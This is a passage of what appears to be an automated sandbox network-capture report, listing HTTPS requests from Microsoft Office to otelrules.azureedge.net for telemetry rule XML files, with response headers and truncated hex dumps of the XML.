                                                                                                                                                                            2024-10-28 18:12:39 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            116192.168.2.44986913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:39 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:39 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                            x-ms-request-id: 19ae2231-801e-007b-0d9c-27e7ab000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181239Z-17fbfdc98bb6kklk3r0qwaavtw000000039000000000etma
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:39 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            117192.168.2.44987013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                            x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bbgnnfwq36myy7z0g000000062g000000001nhm
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            118192.168.2.44987113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                            x-ms-request-id: 54290c1c-d01e-008e-01bf-27387a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bb8mkvjfkt54wa53800000003e0000000001g59
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            119192.168.2.44987213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                            x-ms-request-id: 989b5e1d-301e-003f-2bee-25266f000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c665dwkwce4e7gadz000000006800000000055se
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:40 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            120192.168.2.44987313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                            x-ms-request-id: 30c340ab-b01e-0021-5eb4-26cab7000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c66z67vn9nc21z11a800000004vg000000002vpw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:40 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            121192.168.2.44987413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:40 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                            x-ms-request-id: 0ad7b348-901e-0067-0d67-28b5cb000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-r1755647c66vwt2b5wfzb6a204000000024g0000000048dk
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            122192.168.2.44987513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:40 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:40 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                            x-ms-request-id: 338a3e6d-c01e-0079-709c-27e51a000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181240Z-17fbfdc98bbx59j5xd9kpbrs8400000004yg000000002cnv
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            123192.168.2.44987613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:41 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                            x-ms-request-id: 35d0191b-501e-0047-5a17-26ce6c000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bb5d4fn785en176rg00000005gg000000001n7q
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            124192.168.2.44987813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:41 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:41 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:41 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                            x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181241Z-17fbfdc98bbdbgkb6uyh3q4ue400000004s0000000009hua
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
